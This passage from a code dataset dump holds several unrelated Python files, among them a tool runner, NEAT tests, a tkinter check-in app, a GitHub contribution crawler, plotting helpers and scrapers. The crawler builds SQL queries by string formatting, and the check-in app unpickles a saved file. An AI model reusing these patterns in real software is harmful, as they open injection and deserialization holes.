tool_name = tool_definition['tool_name']\n data_folder = args.data_folder or join(\n HOME_FOLDER, '.crosscompute', tool_name)\n logging.basicConfig(level=logging.WARNING)\n return tool_definition, data_folder\n\n\ndef launch(argv=sys.argv):\n argument_parser = StoicArgumentParser('crosscompute', add_help=False)\n argument_subparsers = argument_parser.add_subparsers(dest='command')\n scripts_by_name = get_scripts_by_name('crosscompute')\n configure_subparsers(argument_subparsers, scripts_by_name)\n args = argument_parser.parse_known_args(argv[1:])[0]\n run_scripts(scripts_by_name, args)\n\n\ndef prepare_tool_definition(tool_name, debug=False):\n if exists('f.cfg'):\n tool_definition = load_tool_definition('f.cfg')\n tool_definition.update(load_result_arguments('x.cfg', tool_definition))\n return tool_definition\n\n for x in ExtensionManager('crosscompute.extensions').extensions:\n if tool_name.endswith('.' + x.name):\n ToolExtension = x.plugin\n break\n else:\n ToolExtension = DefaultTool\n\n try:\n tool_definition = ToolExtension.prepare_tool_definition(\n tool_name, debug)\n except CrossComputeError as e:\n exit(e)\n return tool_definition\n\n\ndef corral_arguments(argument_folder, result_arguments, use=link_path):\n d = result_arguments.copy()\n make_folder(argument_folder)\n for k, v in result_arguments.items():\n if k.endswith('_path'):\n assert isabs(v)\n d[k] = use(join(argument_folder, basename(v)), v)\n return d\n\n\ndef run_script(\n tool_definition, result_arguments, result_folder, target_folder=None,\n environment=None, quietly=False):\n timestamp, environment = time.time(), environment or {}\n if 'target_folder' in tool_definition['argument_names']:\n y = make_folder(abspath(target_folder or join(result_folder, 'y')))\n result_arguments = OrderedDict(result_arguments, target_folder=y)\n # Record\n result_configuration = ResultConfiguration(result_folder, quietly)\n result_configuration.save_tool_location(tool_definition)\n result_configuration.save_result_arguments(result_arguments, environment)\n # Run\n command_terms = split_arguments(render_command(tool_definition[\n 'command_template'].replace('\\n', ' '), result_arguments))\n result_properties = OrderedDict()\n try:\n with cd(tool_definition['configuration_folder']):\n command_process = subprocess.Popen(\n command_terms, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n env=merge_dictionaries(environment, SCRIPT_ENVIRONMENT))\n except OSError:\n stdout, stderr = None, 'Command not found'\n else:\n stdout, stderr = [x.rstrip().decode(\n 'utf-8') for x in command_process.communicate()]\n if command_process.returncode:\n result_properties['return_code'] = command_process.returncode\n # Save\n result_properties.update(_process_streams(\n stdout, stderr, result_folder, tool_definition, quietly))\n result_properties['execution_time_in_seconds'] = time.time() - timestamp\n result_configuration.save_result_properties(result_properties)\n result_configuration.save_result_script(tool_definition, result_arguments)\n if 'target_folder' in tool_definition['argument_names']:\n link_path(join(result_folder, 'y'), result_arguments['target_folder'])\n return result_properties\n\n\ndef _process_streams(\n stdout, stderr, result_folder, tool_definition, quietly=False):\n d, type_errors = OrderedDict(), OrderedDict()\n for file_name, stream_name, stream_content in [\n ('stdout.log', 'standard_output', stdout),\n ('stderr.log', 'standard_error', stderr)]:\n if not stream_content:\n continue\n stream_content = 
stream_content.replace(HOME_FOLDER, COMMAND_LINE_HOME)\n copy_text(join(result_folder, file_name), stream_content + '\\n')\n if not quietly:\n print(SECTION_TEMPLATE % (stream_name, stream_content))\n try:\n value_by_key = parse_data_dictionary(\n stream_content, join(result_folder, 'y'), tool_definition)\n except DataParseError as e:\n for k, v in e.message_by_name.items():\n type_errors['%s.error' % k] = v\n value_by_key = e.value_by_key\n if tool_definition.get('show_' + stream_name):\n d[stream_name] = stream_content\n if value_by_key:\n d[stream_name + 's'] = value_by_key\n if type_errors:\n d['type_errors'] = type_errors\n return d\n","sub_path":"crosscompute/scripts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419562823","text":"#Sum of products which can be represented as pan-digital\n#like The product 7254 is unusual, as the identity, 39 × 186 = 7254, \n#containing multiplicand, multiplier, and product is 1 through 9 pan-digital.\n\ndef isPanDigital(n):\n #The n digit number should have digits from 1 to n, no duplicates\n s = str(n)\n sset = set(s)\n length = len(s)\n if length != len(sset):\n return False\n for d in sset:\n if int(d) < 1 or int(d) > length:\n return False\n return True\n\nprods = {}\nprodsum = 0\nfor mpd in range(2, 100):\n for mpr in range(123 if mpd>9 else 1234, 10000//mpd+1):\n p = mpd*mpr\n s = str(mpd)+str(mpr)+str(p)\n if isPanDigital(int(s)):\n if not prods.get(p, None):\n prods[p] = str(mpd)+'X'+str(mpr)\n prodsum += p\n\nprint(prodsum)\nprint(prods)\n","sub_path":"scripts/032.py","file_name":"032.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"383334396","text":"# -*- coding: utf-8 -*-\r\n# --------------------------------------------------------------------------------------------------------\r\n''' XOR Test '''\r\nfrom Population import Population\r\nfrom Connection import Connection\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\np = Population(150)\r\nfor player in p.people:\r\n weight = 2*np.random.rand() -1\r\n node1 = player.brain.nodes[0]\r\n node2 = player.brain.nodes[-1]\r\n innovationNumber = player.brain.getInnovationNumber(node1, node2 , p.innovationHistory)\r\n connection = Connection(node1, node2, weight, innovationNumber)\r\n player.brain.addConnection(connection)\r\n\r\n weight = 2*np.random.rand()-1\r\n node1 = player.brain.nodes[1]\r\n node2 = player.brain.nodes[-1]\r\n innovationNumber = player.brain.getInnovationNumber(node1, node2 , p.innovationHistory)\r\n connection = Connection(node1, node2, weight, innovationNumber)\r\n player.brain.addConnection(connection)\r\n\r\n weight = 2*np.random.rand()-1\r\n node1 = player.brain.nodes[2]\r\n node2 = player.brain.nodes[-1]\r\n innovationNumber = player.brain.getInnovationNumber(node1, node2 , p.innovationHistory)\r\n connection = Connection(node1, node2, weight, innovationNumber)\r\n player.brain.addConnection(connection)\r\n\r\nmaxScore = 0\r\nwhile maxScore < 4 and p.gen < 50:\r\n p.updateAlive()\r\n for player in p.people:\r\n if player.score > maxScore:\r\n maxScore = player.score\r\n p.naturalSelection()\r\n print(p.gen)\r\np.updateAlive()\r\np.prepare()\r\np.best.brain.draw()\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\n\r\nfit = []\r\nfor player in p.bests:\r\n fit.append(player.fitness)\r\nx = 
range(len(p.bests))\r\nline, = ax.plot(x,fit, color = 'red', label = 'Max fitness')\r\n\r\n\r\naverage = []\r\nfor av in p.average:\r\n average.append(av)\r\nline2, = ax.plot(x, average, color = 'green', label = 'average')\r\nax.legend()\r\nax.set_title('Fitness')\r\nplt.show(fig)\r\n\r\n\r\n# --------------------------------------------------------------------------------------------------------\r\n''' Feed forward test '''\r\n#from Population import Population\r\n#\r\n#p = Population(20)\r\n#inputs = [0.5, 0.2]\r\n#for player in p.people:\r\n# print(player.think(inputs))\r\n\r\n\r\n\r\n\r\n\r\n# --------------------------------------------------------------------------------------------------------\r\n''' Count gene and species recognition '''\r\n#from Population import Population\r\n#from Species import Species\r\n#import time\r\n#\r\n#p = Population(20)\r\n#for player in p.people[:5]:\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# player.brain.nodeMutation(p.innovationHistory)\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# player.brain.draw()\r\n# time.sleep(1)\r\n#\r\n#p.evaluate()\r\n#s = Species(p.people[0])\r\n#for player in p.people[:5]:\r\n# print(s.sameSpecies(player))\r\n\r\n\r\n\r\n# --------------------------------------------------------------------------------------------------------\r\n''' Exemple of why connections that are connected to the two same nodes should have the same innovation number '''\r\n#from Population import Population\r\n#from Connection import Connection\r\n#import time\r\n#\r\n#p = Population(10)\r\n#player = p.people[0]\r\n#node1 = player.brain.nodes[0]\r\n#node2 = player.brain.nodes[3]\r\n#weight = -0.8\r\n#connection = Connection(node1, node2, weight, player.brain.getInnovationNumber(node1, node2, p.innovationHistory))\r\n#player.brain.addConnection(connection)\r\n#player.brain.nodeMutation(p.innovationHistory)\r\n#node1 = player.brain.nodes[2]\r\n#node2 = player.brain.nodes[4]\r\n#weight = 0.8\r\n#connection = Connection(node1, node2, weight, player.brain.getInnovationNumber(node1, node2, p.innovationHistory))\r\n#player.brain.addConnection(connection)\r\n#player.brain.draw()\r\n#time.sleep(2)\r\n#\r\n#player2 = p.people[1]\r\n#node1 = player2.brain.nodes[2]\r\n#node2 = player2.brain.nodes[4]\r\n#weight = 0.3\r\n#connection = Connection(node1, node2, weight, player2.brain.getInnovationNumber(node1, node2, p.innovationHistory))\r\n#player2.brain.addConnection(connection)\r\n#player2.brain.draw()\r\n\r\n\r\n\r\n\r\n\r\n# --------------------------------------------------------------------------------------------------------\r\n''' Innovation testing '''\r\n#from Population import Population\r\n#\r\n#p = Population(20)\r\n#print(p.innovationHistory)\r\n#for player in p.people:\r\n# player.brain.connectionMutation(p.innovationHistory)\r\n# print()\r\n## print(p.innovationHistory)\r\n","sub_path":"2nd Attempt/Testing.py","file_name":"Testing.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"123025846","text":"import empl\r\nimport os.path as path\r\nimport tkinter # note that module name has changed from Tkinter in Python 2 to tkinter in Python 3\r\nimport tkinter.messagebox as messagebox\r\nfrom tkinter import ttk\r\nimport pickle\r\n\r\nclass management:\r\n\r\n def __init__(self,filename= False):\r\n 
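# build the main window widgets; if a saved roster file was given, it is reloaded below\r\n 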
self.studentlist = {}\r\n self.studentname = [\"select\"]\r\n\r\n\r\n\r\n self.root = tkinter.Tk()\r\n self.root.geometry(\"300x300\")\r\n self.spacingframe = tkinter.Frame(self.root,height = 10 ,relief = tkinter.FLAT)\r\n self.spacingframe.pack()\r\n\r\n\r\n\r\n #buttons\r\n\r\n\r\n self.buttonframe = ttk.Frame(self.root, height=50,relief=tkinter.FLAT)\r\n self.buttonframe.pack(pady = 2)\r\n self.createemp = ttk.Button(self.buttonframe,text = \"add student\",command = self.addstudent)\r\n self.createemp.pack(pady = 2)\r\n\r\n\r\n\r\n #makeing drop down list\r\n self.spacingframe1 = ttk.Frame(self.root, height=10, relief=tkinter.FLAT)\r\n self.spacingframe1.pack(pady = 2)\r\n self.selectionframe = ttk.Frame(self.root, height=50, relief=tkinter.FLAT)\r\n self.selectionframe.pack(pady = 2)\r\n\r\n self.selectlable = ttk.Label(self.selectionframe, text=\"student \")\r\n self.selectlable.pack(side=tkinter.LEFT)\r\n\r\n self.choice = tkinter.StringVar(self.root)\r\n self.choice.set(\"select\")\r\n self.students = tkinter.ttk.Combobox(self.selectionframe, textvariable=self.choice, state=\"readonly\")\r\n self.students[\"values\"] = self.studentname\r\n self.students.pack(pady = 2)\r\n\r\n if filename:\r\n self.load(filename)\r\n\r\n\r\n #more buttons\r\n self.buttonframe1 = ttk.Frame(self.root, relief=tkinter.FLAT)\r\n self.buttonframe1.pack(pady = 2)\r\n\r\n self.checkinbutton = ttk.Button(self.buttonframe1,text = \"checkin\" , command = self.checkinfun)\r\n self.checkinbutton.pack(side = tkinter.LEFT,pady = 10, padx = 25)\r\n\r\n self.checkoutbutton = ttk.Button(self.buttonframe1, text=\"checkuout\",command = self.checkoutfun )\r\n self.checkoutbutton.pack(pady = 10, padx = 25)\r\n\r\n self.exitbutton = ttk.Button(self.root, text=\"exit\" , command = self.exit)\r\n self.exitbutton.pack(pady = 10, padx = 25)\r\n self.root.protocol(\"WM_DELETE_WINDOW\",self.exit)\r\n self.root.mainloop()\r\n\r\n\r\n\r\n def addstudent(self):\r\n self.addempwindow = tkinter.Toplevel(self.root)\r\n self.addempwindow.geometry(\"200x200\")\r\n\r\n nameframe = ttk.Frame(self.addempwindow, height=50, relief=tkinter.FLAT)\r\n nameframe.pack(pady=4)\r\n\r\n namelable = ttk.Label(nameframe, text=\"name \")\r\n namelable.pack(side=tkinter.LEFT)\r\n\r\n self.nameentry = ttk.Entry(nameframe)\r\n self.nameentry.pack()\r\n\r\n ageframe = ttk.Frame(self.addempwindow, height=50, relief=tkinter.FLAT)\r\n ageframe.pack(pady=4)\r\n\r\n agelable = ttk.Label(ageframe, text=\"age \")\r\n agelable.pack(side=tkinter.LEFT)\r\n\r\n self.ageentry = ttk.Entry(ageframe)\r\n self.ageentry.pack()\r\n\r\n roleframe = ttk.Frame(self.addempwindow, height=50, relief=tkinter.FLAT)\r\n roleframe.pack(pady=4)\r\n\r\n rolelable = ttk.Label(roleframe, text=\"role \")\r\n rolelable.pack(side=tkinter.LEFT)\r\n\r\n self.roleentry = ttk.Entry(roleframe)\r\n self.roleentry.pack()\r\n\r\n saveframe = ttk.Frame(self.addempwindow, height=50, relief=tkinter.FLAT)\r\n saveframe.pack(pady=4)\r\n\r\n savebutton = ttk.Button(saveframe, text=\"ok\" , command = self.getnewentry)\r\n savebutton.pack(side=tkinter.LEFT)\r\n\r\n\r\n\r\n\r\n def exit(self):\r\n for i in self.studentlist:\r\n self.studentlist[i].checkout()\r\n if messagebox.showinfo(\"exit\", \"saving\"):\r\n self.root.destroy()\r\n\r\n def checkinfun(self):\r\n if self.choice.get()!=\"select\":\r\n self.studentlist[self.choice.get()].checkin()\r\n\r\n def checkoutfun(self):\r\n if self.choice.get()!=\"select\":\r\n self.studentlist[self.choice.get()].checkout()\r\n\r\n def getnewentry(self):\r\n 
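# create a student from the dialog fields, refresh the dropdown values, then close the popup\r\n 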
self.studentlist[self.nameentry.get()]=empl.student(self.nameentry.get(),self.ageentry.get(),self.roleentry.get())\r\n self.studentname.append((self.nameentry.get()))\r\n self.students[\"values\"] = self.studentname\r\n self.addempwindow.destroy()\r\n\r\n def save(self,filename):\r\n fn = open(filename, \"wb\")\r\n pickle.dump(self.studentlist,fn)\r\n pickle.dump(self.studentname,fn)\r\n\r\n def load(self,filename):\r\n fn = open(filename, \"rb\")\r\n self.studentlist = pickle.load(fn)\r\n self.studentname = pickle.load(fn)\r\n self.students[\"values\"] = self.studentname\r\n\r\n\r\nfilename = \"everyone.bin\"\r\n\r\n\r\nif path.isfile(filename):\r\n a = management(filename)\r\nelse:\r\n a = management()\r\n\r\n\r\n\r\na.save(filename)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"225117817","text":"#-*- coding:utf-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport time\nfrom multiprocessing import Pool # Pool import하기\nimport datetime\nfrom db_connect import mysql \nclass test:\n def __init__(self,time):\n self.time=time\n self.session = requests.Session()\n def get_content(self,total):\n conn = mysql.connect()\n cursor = conn.cursor()\n data = total[1]\n nick = total[0]\n abs_link = 'https://github.com/'+data\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n headers = {\n\n 'User-Agent' : user_agent,\n \"Cookie\" : \"tz=Asia%2FSeoul;\"\n}\n \n req = self.session.get(abs_link)\n req = requests.get(abs_link,headers=headers)\n html = req.text\n soup = bs(html, 'html.parser')\n a= soup.findAll('rect')\n resulta={}\n try:\n query = \"update crawler set count = {count} where nickname = '{nickname}'\".format(nickname=nick,count=a[-1]['data-count'])\n cursor.execute(query)\n _data = cursor.fetchall()\n if not _data:\n conn.commit()\n print({\"update Success\": 200})\n else:\n conn.rollback()\n print( {\"update Failed\": 404})\n # resulta[\"id\"] = nick\n # resulta[\"value\"] = a[-1]['data-count']\n except Exception as e:\n print(e) \n cursor.close()\n conn.close()\n return resulta\n\n def register_content(self,total):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n data = total[1]\n nick = total[0]\n abs_link = 'https://github.com/'+data\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n headers = {\n\n 'User-Agent' : user_agent,\n \"Cookie\" : \"tz=Asia%2FSeoul;\"\n}\n \n req = self.session.get(abs_link)\n req = requests.get(abs_link,headers=headers)\n html = req.text\n soup = bs(html, 'html.parser')\n a= soup.findAll('rect')\n resulta={}\n try:\n query = \"insert into crawler(nickname,count) values('{nickname}', {count})\".format(nickname=nick,count=a[-1]['data-count'])\n cursor.execute(query)\n _data = cursor.fetchall()\n print(_data)\n if not _data:\n conn.commit()\n print({\"Register Success\": 200})\n else:\n conn.rollback()\n print( {\"Register Failed\": 404})\n # resulta[\"id\"] = nick\n # resulta[\"value\"] = a[-1]['data-count']\n except Exception as e:\n print(e) \n cursor.close()\n conn.close()\n\n return resulta\n\n def execute(self,num):\n result=[]\n a={ '컴공돌이' : 'cafemug', '또르' : '9992', '복이' : 'changbokLee', '뇸뇸' : 'ellapresso', 'ㄷㄷ' : 'x86kernel', '뇌가딴딴' : 'ljhg1124', '싸이클러' : 'msnodeve', '1컴이' : 'horace-velmont', '레게힙합소년' : 'samkookji77', 
'방탕성현단' : 'seonghy', '해피스마일' : 'rnhappysmile', 'ccpo' : 'ccppoo', '깃토리' : 'haeyoonjo', '퐁퐁' : 'seongminseok', '깃별' : 'wg19', '맹코' : 'mengkko', '감동란' : 'th787706', '현' : 'kim6394', '개발냄새' : 'taewoo1991', 'joe' : 'porquelaquiero', '야옹' : 'asw91666', 'CLY' : 'dogcolley', '펭귄' : \"cruisediary\",\"sogo\" : \"sogoagain\", \"냐\":\"lilynys\", \"kstost\":\"kstost\",\"나부랭이\":\"silverthreadk\"}\n pool = Pool(processes=num) # 4개의 프로세스를 사용합니다.\n result.extend(pool.map(self.get_content, [(k,v) for k,v in a.items()]))# get_contetn 함수를 넣어줍시다.\n return(result)\n\nif __name__ ==\"__main__\":\n now = datetime.datetime.now()\n nowTime = now.strftime('%Y-%m-%d')\n e= test(nowTime)\n result = e.execute(2)\n","sub_path":"test_by_python/thread_crawler.py","file_name":"thread_crawler.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"549141461","text":"import bot.sites.bestbuy as bb\nimport bot.helpers.twilioHelper as twilio\n\n\ndef siteResults():\n\n bb_message = bb.scraper()\n return [bb_message,]\n\ndef fullReport():\n site_results = siteResults()\n report = \"\"\n \n for result in site_results:\n if result != False:\n print('Found something! Writing Report!')\n \n\n\n print(str(result['message']))\n if result['error'] != True:\n report = report + f\"{str(result['message'])} \\n\"\n \n else:\n print('Nothing found!')\n \n if report != \"\":\n twilio.send_sms(report)\n \n\n\n\n \n\n\n\n\n \n\n ","sub_path":"bot/reporter/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"42069096","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/doakey/Sync/Programming/reflowrst/reflowrst/tools/get_field_name.py\n# Compiled at: 2018-01-26 15:31:48\n# Size of source mod 2**32: 290 bytes\n\n\ndef get_field_name(words):\n for x in range(len(words)):\n if words[x].endswith(':'):\n if not words[x].endswith('\\\\:'):\n field_name = ' '.join(words[0:x + 1])\n words = words[x + 1:]\n return (field_name, words)\n\n return (\n 'collect_field.py: ERROR:', [])","sub_path":"pycfiles/reflowrst-1.1.0.tar/get_field_name.cpython-36.py","file_name":"get_field_name.cpython-36.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"318607041","text":"import requests;\nfrom bs4 import BeautifulSoup;\n\n\nurl=\"http://astro.click108.com.tw/daily_8.php?iAstro=8\"\nrequest=requests.get(url)\ncontent=request.content\nsoup=BeautifulSoup(content,\"html.parser\")\n#取出本周的所有日期 ex.2010-01-01 2010-01-02\nall_days=soup.select('#iAcDay')\nall_days = all_days[0].get_text().split('\\n')\n# print(all_days);\nfilename='horoscope.txt';\nfile = open(filename, 'w')\nfor day in all_days:\n if day:\n #當天日期\n basic_url=url+'&iAcDay='\n dayurl=basic_url + day\n \n request=requests.get(dayurl)\n content=request.content\n soup=BeautifulSoup(content,\"html.parser\")\n daycontent=soup.find('div',{'class':'TODAY_CONTENT'})\n print(day)\n file.write(day)\n 
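# append the scraped horoscope text right after its date\n 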
file.write(daycontent.get_text())\n\nfile.close()\nprint('射手座的運勢請看附檔horoscope.txt')\n","sub_path":"horoscope/horoscope-code/horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"74560944","text":"# coding: utf - 8\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon as plt_polygon\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nfrom shapely.geometry import Polygon, MultiLineString\nfrom sentinelhub import CRS, transform_bbox\n\n\ndef show_area(area_shape, area_buffer=0.3):\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111)\n\n minx, miny, maxx, maxy = area_shape.bounds\n lng, lat = (minx + maxx) / 2, (miny + maxy) / 2\n\n m = Basemap(projection='ortho', lat_0=lat, lon_0=lng, resolution='l')\n m.drawcoastlines()\n m.bluemarble()\n\n if isinstance(area_shape, Polygon):\n area_shape = [area_shape]\n for polygon in area_shape:\n x, y = np.array(polygon.boundary)[0]\n m_poly = []\n for x, y in np.array(polygon.boundary):\n m_poly.append(m(x, y))\n ax.add_patch(\n plt_polygon(\n np.array(m_poly), closed=True, facecolor='red', edgecolor='red'))\n\n plt.tight_layout()\n plt.show()\n\n\ndef show_splitter(splitter, alpha=0.2, area_buffer=0.2, show_legend=False):\n area_bbox = splitter.get_area_bbox()\n minx, miny, maxx, maxy = area_bbox\n lng, lat = area_bbox.get_middle()\n w, h = maxx - minx, maxy - miny\n minx = minx - area_buffer * w\n miny = miny - area_buffer * h\n maxx = maxx + area_buffer * w\n maxy = maxy + area_buffer * h\n\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111)\n\n base_map = Basemap(\n projection='mill',\n lat_0=lat,\n lon_0=lng,\n llcrnrlon=minx,\n llcrnrlat=miny,\n urcrnrlon=maxx,\n urcrnrlat=maxy,\n resolution='l',\n epsg=4326)\n base_map.drawcoastlines(color=(0, 0, 0, 0))\n\n area_shape = splitter.get_area_shape()\n if isinstance(area_shape, Polygon):\n area_shape = [area_shape]\n for polygon in area_shape:\n if isinstance(polygon.boundary, MultiLineString):\n for linestring in polygon.boundary:\n ax.add_patch(\n plt_polygon(\n np.array(linestring),\n closed=True,\n facecolor=(0, 0, 0, 0),\n edgecolor='red'))\n else:\n ax.add_patch(\n plt_polygon(\n np.array(polygon.boundary),\n closed=True,\n facecolor=(0, 0, 0, 0),\n edgecolor='red'))\n\n bbox_list = splitter.get_bbox_list()\n info_list = splitter.get_info_list()\n\n cm = plt.get_cmap('jet', len(bbox_list))\n legend_shapes = []\n for i, (bbox, info) in enumerate(zip(bbox_list, info_list)):\n wgs84_bbox = transform_bbox(bbox, CRS.WGS84).get_polygon()\n\n tile_color = tuple(list(cm(i))[:3] + [alpha])\n ax.add_patch(\n plt_polygon(\n np.array(wgs84_bbox),\n closed=True,\n facecolor=tile_color,\n edgecolor='green'))\n\n if show_legend:\n legend_shapes.append(plt.Rectangle((0, 0), 1, 1, fc=cm(i)))\n\n if show_legend:\n plt.legend(legend_shapes, [\n '{},{}'.format(info['index_x'], info['index_y']) for info in info_list\n ])\n plt.tight_layout()\n plt.show()\n\n\ndef show_slices(batches, scan_indices, ns_slice, grid=True, **kwargs):\n \"\"\" Plot slice with number n_slice from scan with index given by scan_index from batch\n \"\"\"\n font_caption = {\n 'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 18\n }\n font = {'family': 'serif', 'color': 'darkred', 'weight': 'normal', 'size': 15}\n\n # fetch some arguments, make iterables out of args\n def 
iterize(arg):\n return arg if isinstance(arg, (list, tuple)) else (arg,)\n\n components = kwargs.get('components', 'images')\n batches, scan_indices, ns_slice, components = [\n iterize(arg) for arg in (batches, scan_indices, ns_slice, components)\n ]\n clims = kwargs.get('clims', (-1200, 300))\n clims = clims if isinstance(clims[0], (tuple, list)) else (clims,)\n\n # lengthen args\n n_boxes = max(len(arg) for arg in (batches, scan_indices, ns_slice, clims))\n\n def lengthen(arg):\n return arg if len(arg) == n_boxes else arg * n_boxes\n\n batches, scan_indices, ns_slice, clims, components = [\n lengthen(arg)\n for arg in (batches, scan_indices, ns_slice, clims, components)\n ]\n\n # plot slices\n _, axes = plt.subplots(1, n_boxes, squeeze=False, figsize=(10, 4 * n_boxes))\n\n zipped = zip(\n range(n_boxes), batches, scan_indices, ns_slice, clims, components)\n\n for i, batch, scan_index, n_slice, clim, component in zipped:\n slc = batch.get(scan_index, component)[n_slice]\n axes[0][i].imshow(slc, cmap=plt.cm.gray, clim=clim)\n axes[0][i].set_xlabel('Shape: {}'.format(slc.shape[1]), fontdict=font)\n axes[0][i].set_ylabel('Shape: {}'.format(slc.shape[0]), fontdict=font)\n title = 'Scan' if component == 'images' else 'Mask'\n axes[0][i].set_title(\n '{} #{}, slice #{} \\n \\n'.format(title, scan_index, n_slice),\n fontdict=font_caption)\n axes[0][i].text(\n 0.2,\n -0.25,\n 'Total slices: {}'.format(len(batch.get(scan_index, component))),\n fontdict=font_caption,\n transform=axes[0][i].transAxes)\n\n # set inverse-spacing grid\n if grid:\n inv_spacing = 1 / batch.get(scan_index, 'spacing').reshape(-1)[1:]\n step_mult = 50\n xticks = np.arange(0, slc.shape[0], step_mult * inv_spacing[0])\n yticks = np.arange(0, slc.shape[1], step_mult * inv_spacing[1])\n axes[0][i].set_xticks(xticks, minor=True)\n axes[0][i].set_yticks(yticks, minor=True)\n axes[0][i].set_xticks([], minor=False)\n axes[0][i].set_yticks([], minor=False)\n\n axes[0][i].grid(color='r', linewidth=1.5, alpha=0.5, which='minor')\n\n plt.show()\n\n\ndef discrete_cmap(N, base_cmap=None):\n \"\"\"Create an N-bin discrete colormap from the specified input map\"\"\"\n base = plt.cm.get_cmap(base_cmap)\n color_list = base(np.linspace(0, 1, N))\n cmap_name = base.name + str(N)\n return base.from_list(cmap_name, color_list, N)\n\n\ndef colorbar(mappable, ticks, labels=None):\n mappable.set_clim(-0.5, len(ticks) - 0.5)\n ax = mappable.axes\n fig = ax.figure\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cbar = fig.colorbar(mappable, cax=cax, ticks=ticks)\n if labels is not None: cbar.ax.set_yticklabels(labels)\n return cbar","sub_path":"sentinel/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":6234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"61675983","text":"# -*- coding:utf-8 -*-\nimport os\nfrom urllib.parse import urlsplit\n\nimport click\n\nfrom bank_merge import inputs, outputs\n\n\nclass BankInputFile(click.Path):\n \"\"\"\n Click type for handling bank input file arguments and delegating\n parsing of such files to selected handler based on file extension.\n\n Expected input is a local file path.\n \"\"\"\n\n PARSERS = {\n '.csv': inputs.CSVFile,\n }\n\n def __init__(self, *, row_parser, **kwargs):\n self.row_parser = row_parser\n kwargs.setdefault('exists', True)\n\n super().__init__(**kwargs)\n\n def convert(self, value, param, ctx):\n path = super().convert(value, param, ctx)\n\n _, ext 
= os.path.splitext(path)\n if ext not in self.PARSERS:\n allowed_extensions = ','.join(self.PARSERS.keys())\n self.fail(\n f'input extension {ext} is not supported, allowed extensions: {allowed_extensions}',\n param,\n ctx,\n )\n\n return self.PARSERS[ext](path=path, row_parser=self.row_parser)\n\n\nclass BankOutput(click.ParamType):\n \"\"\"\n Click type for handling output argument.\n\n Expected input is a local file path or destination URI, ex:\n\n - output.csv\n - /home/me/output.csv\n - /home/me/output.csv\n - file:///home/me/output.csv\n - postgresql://aaa:bbb@localhost/test\n \"\"\"\n name = 'URI'\n\n # for local files, use extension to select proper handler\n EXTENSIONS = {\n '.csv': outputs.CSVFile,\n }\n\n # for non-file URIs, use scheme to select a handler\n SCHEMES = {\n # 'postgresql': outputs.PsqlDB,\n }\n\n def convert(self, value, param, ctx):\n parts = urlsplit(value)\n\n if not parts.scheme or parts.scheme == 'file':\n parsed_value = os.path.normpath(os.path.join(\n parts.netloc,\n parts.path.lstrip('/') if parts.netloc else parts.path\n ))\n\n _, ext = os.path.splitext(parsed_value)\n if ext not in self.EXTENSIONS:\n allowed_extensions = ','.join(self.EXTENSIONS.keys())\n self.fail(\n f'output extension {ext} is not supported, allowed extensions: {allowed_extensions}',\n param,\n ctx,\n )\n\n destination_cls = self.EXTENSIONS[ext]\n else:\n parsed_value = value\n\n if parts.scheme not in self.SCHEMES:\n allowed_schemes = ','.join(self.SCHEMES.keys())\n self.fail(\n f'output scheme {parts.scheme} is not supported, allowed schemes: {allowed_schemes}',\n param,\n ctx,\n )\n\n destination_cls = self.SCHEMES[parts.scheme]\n\n return destination_cls(parsed_value)\n","sub_path":"bank_merge/cli_types.py","file_name":"cli_types.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"320104594","text":"#\n# 1157_단어공부.py\n# BaekjoonAlgorithm\n#\n# Created by EonseokYim on 6/9/19, 4:09 PM.\n# Copyright © 2019 EonseokYim. 
